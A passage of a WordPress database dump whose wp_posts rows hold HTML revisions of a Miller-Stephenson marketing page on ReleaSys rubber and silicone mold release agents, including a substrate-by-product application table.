140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\r\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High Slip</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8800</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Technical Rubber (Neoprene, Nitrile)</span></td>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Highly Filled Elastomer</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><span style="color: #0000ff;"><strong>ReleaSys 8500</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Release most compounds</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Multiple releases</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n<td><span style="font-size: 110%;"> </span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Rubber to Metal Bonding</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Solvent-Based</span></td>\r\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/ptfe-release-agent/"><span style="color: #0000ff;"><strong>MS-122AV</strong></span></a></span></td>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Maximized Durability</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">Quick Dry; Instant Cure</span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n<h3>Technical or Application Support:</h3>\r\n<ul>\r\n 	<li><a href="https://www.miller-stephenson.com/mold-release-application-guide/"><strong>For any questions about proper application of our mold release products please view our article which discusses this process</strong></a></li>\r\n 	<li><strong><a href="https://www.miller-stephenson.com/tech-support/">If you require any further technical or application support please contact our technical staff</a></strong></li>\r\n</ul>\r\n[follow twitter="https://twitter.com/MSChemicals" facebook="https://www.facebook.com/Miller-Stephenson-Chemical-Co-1158843970871033/" googleplus="https://plus.google.com/105252144916647489581" linkedin="https://www.linkedin.com/company/miller-stephenson-chemical-company"]\r\n\r\n[ux_product_categories ids="21" number="10"]\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | ReleaSys™', '', 'publish', 'closed', 'closed', '', 'rubber-mold-release', '', '', '2016-12-22 16:52:41', '2016-12-22 16:52:41', '', 0, 'https://www.miller-stephenson.com/?p=2886', 0, 'post', '', 0); 
INSERT INTO `wp_posts` VALUES (2887, 3, '2016-11-04 17:22:13', '2016-11-04 17:22:13', '', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 17:22:13', '2016-11-04 17:22:13', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2888, 3, '2016-11-04 17:25:44', '2016-11-04 17:25:44', '', 'Rubber Mold Release Silicone Mold Release Agents', '', 'inherit', 'closed', 'closed', '', 'shutterstock_259045955', '', '', '2016-11-24 04:09:14', '2016-11-24 04:09:14', '', 2886, 'https://www.miller-stephenson.com/wp-content/uploads/2016/11/shutterstock_259045955.jpg', 0, 'attachment', 'image/jpeg', 0); 
INSERT INTO `wp_posts` VALUES (2890, 3, '2016-11-04 17:57:09', '2016-11-04 17:57:09', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and moldability of Rubber and Silicone to solve complex problems.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. Miller-Stephenson has rubber mold release agents and silicone mold release agents for every company’s required performance specifications. For solutions to your rubber and silicone mold release problems you can rely on the Miller-Stephenson\'s flagship mold release line, ReleaSys, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find a solution. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 17:57:09', '2016-11-04 17:57:09', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2891, 3, '2016-11-04 18:15:21', '2016-11-04 18:15:21', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the Miller-Stephenson\'s flagship mold release line, ReleaSys, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys products are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized semi-permanent ReleaSys line eliminates rubber to metal bonding failures resulting in dramatically lower scrap rates.\r\n\r\nOur ReleaSys mold release products, include solvent based and water based mold release agents for general rubber goods and rubber-to-metal bonding products. For technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products the ReleaSys line has a number of water based products for your application.\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 18:15:21', '2016-11-04 18:15:21', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2892, 3, '2016-11-04 19:22:39', '2016-11-04 19:22:39', '<h1 style="text-align: justify;">Superior Performing Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\r\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements necessary in toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>, and our worldwide reputation for unsurpassed expertise, consistent quality, and value to help you find the solution you require. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\r\n\r\nReleaSys products are recommended for releasing all natural and synthetic rubbers / elastomer compounds including silicone. Miller-Stephenson release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates.\r\n<h2><span style="text-decoration: underline;"><strong>Carrier Solvents: Low or No VOC; 100% Non-Flammable; Low Odor</strong></span></h2>\r\nOur ReleaSys mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\r\n<h1>Application Guide</h1>\r\n<table width="720">\r\n<tbody>\r\n<tr>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\r\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\r\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\r\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\r\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3">High-Temperature</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8800</td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Low Mold Building</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8500</td>\r\n<td>• Medium Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Instantaneous Cure</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="4" width="122">General Rubber Goods</td>\r\n<td style="text-align: center;" rowspan="4" width="122">High Flow Injection Molding</td>\r\n<td style="text-align: center;" rowspan="4">Water-based</td>\r\n<td style="text-align: center;" rowspan="4">ReleaSys 8800</td>\r\n<td>• High Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal Rejection Rate</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8200</td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3">Silicone Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Solvent-based</td>\r\n<td style="text-align: center;" rowspan="3">MS-122AV</td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3">High Slip</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8800</td>\r\n<td>• Highest Slip</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Fast Cure (1-2 min)</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Technical Rubber (Neoprene, Nitrile)</td>\r\n<td style="text-align: center;" rowspan="3" width="122">Highly Filled Elastomer</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8500</td>\r\n<td>• Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• Minimal transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• Release most compounds</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">ReleaSys 8200</td>\r\n<td>• Multiple releases</td>\r\n</tr>\r\n<tr>\r\n<td>• No transfer</td>\r\n</tr>\r\n<tr>\r\n<td>• High Durability</td>\r\n</tr>\r\n<tr>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n<td></td>\r\n</tr>\r\n<tr>\r\n<td style="text-align: center;" rowspan="3" width="122">Rubber to Metal Bonding</td>\r\n<td style="text-align: center;" rowspan="3">-</td>\r\n<td style="text-align: center;" rowspan="3">Water-based</td>\r\n<td style="text-align: center;" rowspan="3">MS-122AV</td>\r\n<td>• Maximized Durability</td>\r\n</tr>\r\n<tr>\r\n<td>• Quick Dry; Instant Cure</td>\r\n</tr>\r\n<tr>\r\n<td>• No Transfer</td>\r\n</tr>\r\n</tbody>\r\n</table>\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;\r\n\r\n&nbsp;', 'Rubber & Silicone Mold Release Agents | Miller-Stephenson', '', 'inherit', 'closed', 'closed', '', '2886-revision-v1', '', '', '2016-11-04 19:22:39', '2016-11-04 19:22:39', '', 2886, 'https://www.miller-stephenson.com/2886-revision-v1/', 0, 'revision', '', 0); 
INSERT INTO `wp_posts` VALUES (2893, 3, '2016-11-24 04:08:48', '2016-11-24 04:08:48', '<h1 style="text-align: justify;"><strong>Pioneering Rubber Mold Release Agents &amp; Silicone Mold Release Agents</strong></h1>\nSporting goods, machinery, office equipment, automotive tires, footwear and many other industrial products take advantage of the flexibility and robustness of rubber and silicone to solve complex mechanical issues.  As such, the molds to form these shapes and the requirements placed upon mold release agents have increased tremendously. In response, Miller-Stephenson has developed the most advanced rubber mold release agents and silicone mold release agents to meet and exceed all performance requirements in today\'s toughest molding challenges. For solutions to your rubber and silicone mold release problems you can rely on the <a href="https://www.miller-stephenson.com/chemicals/mold-release-agents/semi-permanent-release-agents/">Miller-Stephenson\'s flagship mold release line, <strong>ReleaSys</strong></a>™, and our worldwide reputation for unsurpassed expertise, consistent quality, and value. With products for both solvent based and water based applications, the ReleaSys line of mold release agents contribute to ensure efficient, cost effective, and high quality release of your molded parts.\n\nReleaSys Rubber Mold Release agents are recommended for releasing all natural and synthetic rubbers / elastomer compounds. Our release agents chemically bond to mold surfaces ensuring the highest number of releases per application with minimal transfer and no mold fouling. Our specialized release agents eliminate rubber to metal bonding failures resulting in dramatically lower scrap rates. ReleaSys™ Silicone Mold Release agents offer superior durability, maximized surface adhesion and ease of release.\n<h2><span style="text-decoration: underline;"><strong>Low or No VOC, Minimal Odor, 100% Non-Flammable</strong></span></h2>\nOur ReleaSys™ mold release products, include <strong><a href="https://www.miller-stephenson.com/product/semi-permanent-mold-release-agents/">solvent based</a></strong> and <a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong>water based</strong></a> mold release agents for general rubber goods, rubber-to-metal bonding, and silicones elastomers. Our solvent-based products utilize ultra low odor, low VOC and 100% non-flammable formulations dramatically reducing operator safety hazards and minimizing exposure. Water-based formulations are 100% VOC-free and yield the same reliable performance in a more environmentally friendly formulation.  Our water-based formulations are particular effective on technical rubber (ie: Neoprene, Nitrile) and silicone elastomer products, providing instantaneous cure and maximized durability.\n<h1>Application Guide For Rubber Mold Release Agents &amp; Silicone Mold Release Agents</h1>\n<table style="height: 1010px;" width="829">\n<tbody>\n<tr>\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Molding Substrate</span></span></td>\n<td style="text-align: center;" width="122"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Application</span></span></td>\n<td style="text-align: center;" width="153"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Carrier Solvent </span></span></td>\n<td style="text-align: center;" width="144"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Product</span></span></td>\n<td style="text-align: center;" width="179"><span style="text-decoration: underline; color: #808080;"><span style="font-size: 140%;">Description</span></span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">High-Temperature</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Highest Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Fast Cure (1-2 min)</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="3" width="122"><span style="font-size: 110%;">Low Mold Building</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/rubber-molding-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8500</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Medium Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No Transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Instantaneous Cure</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">General Rubber Goods</span></td>\n<td style="text-align: center;" rowspan="4" width="122"><span style="font-size: 110%;">High Flow Injection Molding</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="4"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/composite-mold-release-agent/"><strong><span style="color: #0000ff;">ReleaSys 8800</span></strong></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">High Slip</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">Minimal Rejection Rate</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">High Durability</span></td>\n</tr>\n<tr>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n<td><span style="font-size: 110%;"> </span></td>\n</tr>\n<tr>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Silicone Elastomer</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">-</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 110%;">Water-based</span></td>\n<td style="text-align: center;" rowspan="3"><span style="font-size: 115%;"><a href="https://www.miller-stephenson.com/product/dry-film-release-agents/"><span style="color: #0000ff;"><strong>ReleaSys 8200</strong></span></a></span></td>\n<td style="text-align: center;"><span style="font-size: 110%;">Instant Cure</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span style="font-size: 110%;">No transfer</span></td>\n</tr>\n<tr>\n<td style="text-align: center;"><span 